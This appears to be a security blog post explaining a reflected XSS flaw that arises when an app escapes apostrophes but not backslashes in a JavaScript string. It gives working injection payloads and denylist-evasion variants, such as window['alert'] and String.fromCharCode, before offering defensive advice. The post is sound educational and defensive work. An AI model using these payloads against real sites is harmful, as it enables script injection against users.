Escape from Normality

John Carpenter fans know the only way you’ll escape from New York is if Snake Plissken is there to get you out. When it comes to web security, don’t bother waiting for Kurt Russell’s help. You’re on your own.

And if you’re dealing with escape characters in JavaScript strings, you’ll want to make sure your application is a maximum security environment.

Imagine an app with a search function. It takes a form field named q and, instead of reflecting the search term in the field’s value, it updates the value attribute with a one-line JavaScript call. Normally, you’d expect an app to just rewrite the <input> field like so:

<input id="searchResult" type="text" name="q" value="abc">

It’s not necessarily a bad idea to update the element’s value with JavaScript. Building HTML with string concatenation is a notorious vector for XSS. Writing the value with JavaScript might be more secure than rebuilding the HTML every time because the assignment avoids several encoding problems. This works if you’re keeping the HTML static and trading JSON messages with the server.

On the other hand, if you move the server-side string concatenation from the <input> field to a <script> tag, then you’ve shifted the XSS problem to a different vector. In our target app, the <input> field’s value was delimited with quotation marks (“). The JavaScript code uses apostrophes (‘) to delimit the string, as follows:

<script>
document.getElementById('searchResult').value = 'abc';
</script>

Rather than strip apostrophes from the search variable’s value, the developers decided to escape them with backslashes. Here’s how it’s expected to work when a user searches for abc'.

document.getElementById('searchResult').value = 'abc\\'';

Escaping the payload’s apostrophe preserves the original string delimiters, prevents the JavaScript syntax from being manipulated, and blocks HTML injection attacks – so it seems.

What if the escape is escaped? Perhaps by throwing a backslash of your own into a search term like abc\\'.

document.getElementById('searchResult').value = 'abc\\\\'';

The developers caught the apostrophe, but missed the backslash. When JavaScript tokenizes the string it sees the escape working on the second backslash instead of the apostrophe. This corrupts the syntax, as follows:

//              ⬇ end of string token
value = 'abc\\\\'';
//               ⬆ dangling apostrophe

From here we just start throwing HTML injection payloads against the app. JavaScript interprets \\ as a single backslash, accepts the apostrophe as the string terminator, and parses the rest of our payload.

https://web.site/search?q=abc**\\';alert(9)//**

document.getElementById('searchResult').value = 'abc\\\\';alert(9)//';

JavaScript’s semantics are lovely from an attacker’s perspective. Here’s an example payload using the String concatenation operator (+) to glue the alert function to the value:

https://web.site/search?q=**abc\\'%2balert(9)//**

document.getElementById('searchResult').value = 'abc\\\\'+alert(9)//';

Or we could try a payload that uses the modulo operator (%) between the String and our alert.

abc\\'%alert(9)//

Maybe the developers added the alert function to a denylist, e.g. a regex for alert\(, by checking for an opening parenthesis. In that case, call the function via the window object’s property list. This makes it look like an innocuous string to naive regexes:

abc\\'%window["alert"](9)//

What happens if the denylist contained the word alert altogether? Build the string character by character:

abc\\'window[String.fromCharCode(0x61,0x6c,0x65,0x72,0x74)](9)//

By now we’ve turned an evasion of an escaped apostrophe into an exercise in obfuscation and filter bypasses. These examples focused on all the permutations of escape sequences in JavaScript strings. Check out the HIQR for more anti-regex patterns and JavaScript obfuscation techniques.

A few additional tips when defending against the payloads:

In code reviews, be suspicious of string concatenation. Use safer methods to bind user-supplied data to HTML.
If you create output encoding methods rather than relying on frameworks like React, make sure they match the DOM context where the data will be written.
Normalize data before operating on it, whether this entails character set conversion, character encoding, substitution, or removal.
Apply security checks after normalization, preferring inclusion lists over exclusion lists – it’s a lot easier to guess what’s safe than assume what’s dangerous.

Normalization is an important first step. Any time you transform data you should reapply security checks. Snake Plissken was never one for offering advice. Instead, think of The Hitchhiker’s Guide to the Galaxy and recall Trillian’s report as the Infinite Improbability Drive powers down (p. 61):

…we have normality, I repeat we have normality….Anything you still can’t cope with is therefore your own problem.

Good luck with normality and trying to correctly escape data. Security isn’t a certainty, but one thing is, at least according to Queen – there’s ”no escape from reality.”